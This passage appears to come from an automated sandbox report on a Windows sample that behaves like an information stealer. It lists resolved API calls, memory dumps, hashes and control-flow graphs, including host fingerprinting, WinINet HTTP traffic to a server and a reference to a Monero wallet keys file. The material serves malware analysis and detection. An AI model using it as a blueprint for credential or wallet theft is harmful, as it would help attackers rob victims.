                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: 11d470ef66eaa940c7f73e47a031d10be2c21768f2752079d3620ccacaf3b8ab
                                  • Instruction ID: 7dc331c3abf6a94ebdd228505384360b7456e533a100788abc164a097d146dec
                                  • Opcode Fuzzy Hash: 11d470ef66eaa940c7f73e47a031d10be2c21768f2752079d3620ccacaf3b8ab
                                  • Instruction Fuzzy Hash: 77713BB1A04218ABDF24DBA4CC59FEE77B9EB45700F1081D9F50A7B190DBB46A84CF51

                                  Control-flow Graph (rendered as an image in the report; not reproduced here)
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BB76D2
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BB770F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7793
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB779A
                                  • wsprintfA.USER32 ref: 00BB77D0
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 1544550907-3809124531
                                  • Opcode ID: 5bcb2334236ac90b4c9a0f7f2a0ee056c5ec5811a4f5c84a35b9360d6f6c501e
                                  • Instruction ID: 1ee6bab3b1acd59f3e50ffa839a2936e7c283986f86ffd50a2cd3ccd34313120
                                  • Opcode Fuzzy Hash: 5bcb2334236ac90b4c9a0f7f2a0ee056c5ec5811a4f5c84a35b9360d6f6c501e
                                  • Instruction Fuzzy Hash: 234184B1D44348AFDB10DB95DC85BEEB7B8AF48704F1040D9F509B7280DBB4AA84CBA5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BA11B7), ref: 00BB7A10
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7A17
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BB7A2F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 890202ed6604eecdbab3fb55d5e4d5a2173e56124a0df162646515b92ae23d27
                                  • Instruction ID: f639339fe9dd5cf3e7cfbd8d9c5e8586b04891ef42d85fc94e1e9c0fda0a714d
                                  • Opcode Fuzzy Hash: 890202ed6604eecdbab3fb55d5e4d5a2173e56124a0df162646515b92ae23d27
                                  • Instruction Fuzzy Hash: 84F0AFB1948209EFCB00DF89DC45BAEBBB8EB04711F10025AF619A3690C7B41544CBA0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 9f4e2748ed2548846afcde3b16dc92b5fb90885117c7c19c068a274846c3752d
                                  • Instruction ID: b89fc32d2a3e0e66126297b8325f5b0ffb477943728779966bcb122a6b169070
                                  • Opcode Fuzzy Hash: 9f4e2748ed2548846afcde3b16dc92b5fb90885117c7c19c068a274846c3752d
                                  • Instruction Fuzzy Hash: F8D05E7490930C9FCB00DFE198496DDBBB8BB08225F400594D90972240EA305485CB65

                                  Control-flow Graph (rendered as an image in the report; not reproduced here)
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,012F70A8), ref: 00BB9F3D
                                  • GetProcAddress.KERNEL32(75900000,012F70C8), ref: 00BB9F55
                                  • GetProcAddress.KERNEL32(75900000,01309B48), ref: 00BB9F6E
                                  • GetProcAddress.KERNEL32(75900000,01309AA0), ref: 00BB9F86
                                  • GetProcAddress.KERNEL32(75900000,0130D500), ref: 00BB9F9E
                                  • GetProcAddress.KERNEL32(75900000,0130D5F0), ref: 00BB9FB7
                                  • GetProcAddress.KERNEL32(75900000,012FBFE8), ref: 00BB9FCF
                                  • GetProcAddress.KERNEL32(75900000,0130D410), ref: 00BB9FE7
                                  • GetProcAddress.KERNEL32(75900000,0130D5C0), ref: 00BBA000
                                  • GetProcAddress.KERNEL32(75900000,0130D560), ref: 00BBA018
                                  • GetProcAddress.KERNEL32(75900000,0130D5D8), ref: 00BBA030
                                  • GetProcAddress.KERNEL32(75900000,012F6F48), ref: 00BBA049
                                  • GetProcAddress.KERNEL32(75900000,012F6F88), ref: 00BBA061
                                  • GetProcAddress.KERNEL32(75900000,012F71E8), ref: 00BBA079
                                  • GetProcAddress.KERNEL32(75900000,012F6FA8), ref: 00BBA092
                                  • GetProcAddress.KERNEL32(75900000,0130D350), ref: 00BBA0AA
                                  • GetProcAddress.KERNEL32(75900000,0130D608), ref: 00BBA0C2
                                  • GetProcAddress.KERNEL32(75900000,012FBF48), ref: 00BBA0DB
                                  • GetProcAddress.KERNEL32(75900000,012F7208), ref: 00BBA0F3
                                  • GetProcAddress.KERNEL32(75900000,0130D620), ref: 00BBA10B
                                  • GetProcAddress.KERNEL32(75900000,0130D530), ref: 00BBA124
                                  • GetProcAddress.KERNEL32(75900000,0130D440), ref: 00BBA13C
                                  • GetProcAddress.KERNEL32(75900000,0130D638), ref: 00BBA154
                                  • GetProcAddress.KERNEL32(75900000,012F70E8), ref: 00BBA16D
                                  • GetProcAddress.KERNEL32(75900000,0130D368), ref: 00BBA185
                                  • GetProcAddress.KERNEL32(75900000,0130D3C8), ref: 00BBA19D
                                  • GetProcAddress.KERNEL32(75900000,0130D4B8), ref: 00BBA1B6
                                  • GetProcAddress.KERNEL32(75900000,0130D380), ref: 00BBA1CE
                                  • GetProcAddress.KERNEL32(75900000,0130D398), ref: 00BBA1E6
                                  • GetProcAddress.KERNEL32(75900000,0130D3B0), ref: 00BBA1FF
                                  • GetProcAddress.KERNEL32(75900000,0130D4E8), ref: 00BBA217
                                  • GetProcAddress.KERNEL32(75900000,0130D4D0), ref: 00BBA22F
                                  • GetProcAddress.KERNEL32(75900000,0130D518), ref: 00BBA248
                                  • GetProcAddress.KERNEL32(75900000,0130A988), ref: 00BBA260
                                  • GetProcAddress.KERNEL32(75900000,0130D3E0), ref: 00BBA278
                                  • GetProcAddress.KERNEL32(75900000,0130D3F8), ref: 00BBA291
                                  • GetProcAddress.KERNEL32(75900000,012F7108), ref: 00BBA2A9
                                  • GetProcAddress.KERNEL32(75900000,0130D548), ref: 00BBA2C1
                                  • GetProcAddress.KERNEL32(75900000,012F7128), ref: 00BBA2DA
                                  • GetProcAddress.KERNEL32(75900000,0130D578), ref: 00BBA2F2
                                  • GetProcAddress.KERNEL32(75900000,0130D428), ref: 00BBA30A
                                  • GetProcAddress.KERNEL32(75900000,012F7148), ref: 00BBA323
                                  • GetProcAddress.KERNEL32(75900000,012F7168), ref: 00BBA33B
                                  • LoadLibraryA.KERNEL32(0130D458,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA34D
                                  • LoadLibraryA.KERNEL32(0130D470,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA35E
                                  • LoadLibraryA.KERNEL32(0130D488,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA370
                                  • LoadLibraryA.KERNEL32(0130D4A0,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA382
                                  • LoadLibraryA.KERNEL32(0130D590,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA393
                                  • LoadLibraryA.KERNEL32(0130D5A8,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA3A5
                                  • LoadLibraryA.KERNEL32(0130D7A0,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA3B7
                                  • LoadLibraryA.KERNEL32(0130D740,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA3C8
                                  • GetProcAddress.KERNEL32(75FD0000,012F73C8), ref: 00BBA3EA
                                  • GetProcAddress.KERNEL32(75FD0000,0130D680), ref: 00BBA402
                                  • GetProcAddress.KERNEL32(75FD0000,01309398), ref: 00BBA41A
                                  • GetProcAddress.KERNEL32(75FD0000,0130D818), ref: 00BBA433
                                  • GetProcAddress.KERNEL32(75FD0000,012F73A8), ref: 00BBA44B
                                  • GetProcAddress.KERNEL32(734B0000,012FBE08), ref: 00BBA470
                                  • GetProcAddress.KERNEL32(734B0000,012F7428), ref: 00BBA489
                                  • GetProcAddress.KERNEL32(734B0000,012FBAE8), ref: 00BBA4A1
                                  • GetProcAddress.KERNEL32(734B0000,0130D6C8), ref: 00BBA4B9
                                  • GetProcAddress.KERNEL32(734B0000,0130D788), ref: 00BBA4D2
                                  • GetProcAddress.KERNEL32(734B0000,012F7588), ref: 00BBA4EA
                                  • GetProcAddress.KERNEL32(734B0000,012F74E8), ref: 00BBA502
                                  • GetProcAddress.KERNEL32(734B0000,0130D830), ref: 00BBA51B
                                  • GetProcAddress.KERNEL32(763B0000,012F74A8), ref: 00BBA53C
                                  • GetProcAddress.KERNEL32(763B0000,012F73E8), ref: 00BBA554
                                  • GetProcAddress.KERNEL32(763B0000,0130D938), ref: 00BBA56D
                                  • GetProcAddress.KERNEL32(763B0000,0130D860), ref: 00BBA585
                                  • GetProcAddress.KERNEL32(763B0000,012F7528), ref: 00BBA59D
                                  • GetProcAddress.KERNEL32(750F0000,012FBC78), ref: 00BBA5C3
                                  • GetProcAddress.KERNEL32(750F0000,012FBBD8), ref: 00BBA5DB
                                  • GetProcAddress.KERNEL32(750F0000,0130D890), ref: 00BBA5F3
                                  • GetProcAddress.KERNEL32(750F0000,012F7488), ref: 00BBA60C
                                  • GetProcAddress.KERNEL32(750F0000,012F75A8), ref: 00BBA624
                                  • GetProcAddress.KERNEL32(750F0000,012FBC00), ref: 00BBA63C
                                  • GetProcAddress.KERNEL32(75A50000,0130D770), ref: 00BBA662
                                  • GetProcAddress.KERNEL32(75A50000,012F7448), ref: 00BBA67A
                                  • GetProcAddress.KERNEL32(75A50000,013093A8), ref: 00BBA692
                                  • GetProcAddress.KERNEL32(75A50000,0130D7E8), ref: 00BBA6AB
                                  • GetProcAddress.KERNEL32(75A50000,0130D8A8), ref: 00BBA6C3
                                  • GetProcAddress.KERNEL32(75A50000,012F72C8), ref: 00BBA6DB
                                  • GetProcAddress.KERNEL32(75A50000,012F7508), ref: 00BBA6F4
                                  • GetProcAddress.KERNEL32(75A50000,0130D710), ref: 00BBA70C
                                  • GetProcAddress.KERNEL32(75A50000,0130D848), ref: 00BBA724
                                  • GetProcAddress.KERNEL32(75070000,012F7468), ref: 00BBA746
                                  • GetProcAddress.KERNEL32(75070000,0130D878), ref: 00BBA75E
                                  • GetProcAddress.KERNEL32(75070000,0130D800), ref: 00BBA776
                                  • GetProcAddress.KERNEL32(75070000,0130D8C0), ref: 00BBA78F
                                  • GetProcAddress.KERNEL32(75070000,0130D7B8), ref: 00BBA7A7
                                  • GetProcAddress.KERNEL32(74E50000,012F7408), ref: 00BBA7C8
                                  • GetProcAddress.KERNEL32(74E50000,012F72E8), ref: 00BBA7E1
                                  • GetProcAddress.KERNEL32(75320000,012F74C8), ref: 00BBA802
                                  • GetProcAddress.KERNEL32(75320000,0130D7D0), ref: 00BBA81A
                                  • GetProcAddress.KERNEL32(6F060000,012F7548), ref: 00BBA840
                                  • GetProcAddress.KERNEL32(6F060000,012F7328), ref: 00BBA858
                                  • GetProcAddress.KERNEL32(6F060000,012F7308), ref: 00BBA870
                                  • GetProcAddress.KERNEL32(6F060000,0130D8D8), ref: 00BBA889
                                  • GetProcAddress.KERNEL32(6F060000,012F7368), ref: 00BBA8A1
                                  • GetProcAddress.KERNEL32(6F060000,012F72A8), ref: 00BBA8B9
                                  • GetProcAddress.KERNEL32(6F060000,012F7348), ref: 00BBA8D2
                                  • GetProcAddress.KERNEL32(6F060000,012F7568), ref: 00BBA8EA
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00BBA901
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00BBA917
                                  • GetProcAddress.KERNEL32(74E00000,0130D8F0), ref: 00BBA939
                                  • GetProcAddress.KERNEL32(74E00000,01309478), ref: 00BBA951
                                  • GetProcAddress.KERNEL32(74E00000,0130D908), ref: 00BBA969
                                  • GetProcAddress.KERNEL32(74E00000,0130D758), ref: 00BBA982
                                  • GetProcAddress.KERNEL32(74DF0000,012F75E8), ref: 00BBA9A3
                                  • GetProcAddress.KERNEL32(6F9C0000,0130D920), ref: 00BBA9C4
                                  • GetProcAddress.KERNEL32(6F9C0000,012F7608), ref: 00BBA9DD
                                  • GetProcAddress.KERNEL32(6F9C0000,0130D650), ref: 00BBA9F5
                                  • GetProcAddress.KERNEL32(6F9C0000,0130D668), ref: 00BBAA0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: ebd21827cdc6af02b688e0571b2a4d420ba3d7037f1a10575572bf05101c49ec
                                  • Instruction ID: 9496052ef8715ca04b55dda1a969687ce87c9b180d84b51b28f3eebe83398ee2
                                  • Opcode Fuzzy Hash: ebd21827cdc6af02b688e0571b2a4d420ba3d7037f1a10575572bf05101c49ec
                                  • Instruction Fuzzy Hash: F3629DB561A6419FC344DFABFC889167BB9B74D345340852ABA9DE3230DB7099C8CF60

                                  Control-flow Graph

                                  control_flow_graph 801 ba48d0-ba4992 call bbaab0 call ba4800 call bbaa50 * 5 InternetOpenA StrCmpCA 816 ba499b-ba499f 801->816 817 ba4994 801->817 818 ba4f1b-ba4f43 InternetCloseHandle call bbade0 call baa210 816->818 819 ba49a5-ba4b1d call bb8cf0 call bbac30 call bbabb0 call bbab10 * 2 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbac30 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbac30 call bbabb0 call bbab10 * 2 InternetConnectA 816->819 817->816 829 ba4f82-ba4ff2 call bb8b20 * 2 call bbaab0 call bbab10 * 8 818->829 830 ba4f45-ba4f7d call bbab30 call bbacc0 call bbabb0 call bbab10 818->830 819->818 905 ba4b23-ba4b27 819->905 830->829 906 ba4b29-ba4b33 905->906 907 ba4b35 905->907 908 ba4b3f-ba4b72 HttpOpenRequestA 906->908 907->908 909 ba4b78-ba4e78 call bbacc0 call bbabb0 call bbab10 call bbac30 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbac30 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbac30 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbac30 call bbabb0 call bbab10 call bbaa50 call bbac30 * 2 call bbabb0 call bbab10 * 2 call bbade0 lstrlen call bbade0 * 2 lstrlen call bbade0 HttpSendRequestA 908->909 910 ba4f0e-ba4f15 InternetCloseHandle 908->910 1021 ba4e82-ba4eac InternetReadFile 909->1021 910->818 1022 ba4eae-ba4eb5 1021->1022 1023 ba4eb7-ba4f09 InternetCloseHandle call bbab10 1021->1023 1022->1023 1025 ba4eb9-ba4ef7 call bbacc0 call bbabb0 call bbab10 1022->1025 1023->910 1025->1021
                                  APIs
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4889
                                    • Part of subcall function 00BA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4899
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BA4965
                                  • StrCmpCA.SHLWAPI(?,0130EE58), ref: 00BA498A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA4B0A
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00BC0DDE,00000000,?,?,00000000,?,",00000000,?,0130EDD8), ref: 00BA4E38
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BA4E54
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BA4E68
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BA4E99
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA4EFD
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA4F15
                                  • HttpOpenRequestA.WININET(00000000,0130EE68,?,0130E828,00000000,00000000,00400100,00000000), ref: 00BA4B65
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA4F1F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: e01c0f644863ed9c792e769a4f3a3d375e62bbda95adfcb6d6045361c9c2b954
                                  • Instruction ID: 9d75194a5c3b11e9c6a71426ec257bdfdf3ec657a408897124e57b3f5e89b744
                                  • Opcode Fuzzy Hash: e01c0f644863ed9c792e769a4f3a3d375e62bbda95adfcb6d6045361c9c2b954
                                  • Instruction Fuzzy Hash: CE12C772D10118ABCB25EB90DDA2FEEB7B9AF55300F5045D9B11672091EFB06B48CB62

                                  Control-flow Graph

                                  control_flow_graph 1090 bb5760-bb57c7 call bb5d20 call bbab30 * 3 call bbaa50 * 4 1106 bb57cc-bb57d3 1090->1106 1107 bb5827-bb589c call bbaa50 * 2 call ba1590 call bb5510 call bbabb0 call bbab10 call bbade0 StrCmpCA 1106->1107 1108 bb57d5-bb5806 call bbab30 call bbaab0 call ba1590 call bb5440 1106->1108 1134 bb58e3-bb58f9 call bbade0 StrCmpCA 1107->1134 1138 bb589e-bb58de call bbaab0 call ba1590 call bb5440 call bbabb0 call bbab10 1107->1138 1124 bb580b-bb5822 call bbabb0 call bbab10 1108->1124 1124->1134 1139 bb58ff-bb5906 1134->1139 1140 bb5a2c-bb5a94 call bbabb0 call bbab30 * 2 call ba16b0 call bbab10 * 4 call ba1670 call ba1550 1134->1140 1138->1134 1142 bb5a2a-bb5aaf call bbade0 StrCmpCA 1139->1142 1143 bb590c-bb5913 1139->1143 1269 bb5d13-bb5d16 1140->1269 1162 bb5be1-bb5c49 call bbabb0 call bbab30 * 2 call ba16b0 call bbab10 * 4 call ba1670 call ba1550 1142->1162 1163 bb5ab5-bb5abc 1142->1163 1147 bb596e-bb59e3 call bbaa50 * 2 call ba1590 call bb5510 call bbabb0 call bbab10 call bbade0 StrCmpCA 1143->1147 1148 bb5915-bb5969 call bbab30 call bbaab0 call ba1590 call bb5440 call bbabb0 call bbab10 1143->1148 1147->1142 1246 bb59e5-bb5a25 call bbaab0 call ba1590 call bb5440 call bbabb0 call bbab10 1147->1246 1148->1142 1162->1269 1169 bb5bdf-bb5c64 call bbade0 StrCmpCA 1163->1169 1170 bb5ac2-bb5ac9 1163->1170 1198 bb5c78-bb5ce1 call bbabb0 call bbab30 * 2 call ba16b0 call bbab10 * 4 call ba1670 call ba1550 1169->1198 1199 bb5c66-bb5c71 Sleep 1169->1199 1177 bb5acb-bb5b1e call bbab30 call bbaab0 call ba1590 call bb5440 call bbabb0 call bbab10 1170->1177 1178 bb5b23-bb5b98 call bbaa50 * 2 call ba1590 call bb5510 call bbabb0 call bbab10 call bbade0 StrCmpCA 1170->1178 1177->1169 1178->1169 1275 bb5b9a-bb5bda call bbaab0 call ba1590 call bb5440 call bbabb0 call bbab10 1178->1275 1198->1269 1199->1106 1246->1142 1275->1169
                                  APIs
                                    • Part of subcall function 00BBAB30: lstrlen.KERNEL32(00BA4F55,?,?,00BA4F55,00BC0DDF), ref: 00BBAB3B
                                    • Part of subcall function 00BBAB30: lstrcpy.KERNEL32(00BC0DDF,00000000), ref: 00BBAB95
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5894
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB58F1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5AA7
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BB5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5478
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BB5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5568
                                    • Part of subcall function 00BB5510: lstrlen.KERNEL32(00000000), ref: 00BB557F
                                    • Part of subcall function 00BB5510: StrStrA.SHLWAPI(00000000,00000000), ref: 00BB55B4
                                    • Part of subcall function 00BB5510: lstrlen.KERNEL32(00000000), ref: 00BB55D3
                                    • Part of subcall function 00BB5510: lstrlen.KERNEL32(00000000), ref: 00BB55FE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB59DB
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5B90
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5C5C
                                  • Sleep.KERNEL32(0000EA60), ref: 00BB5C6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
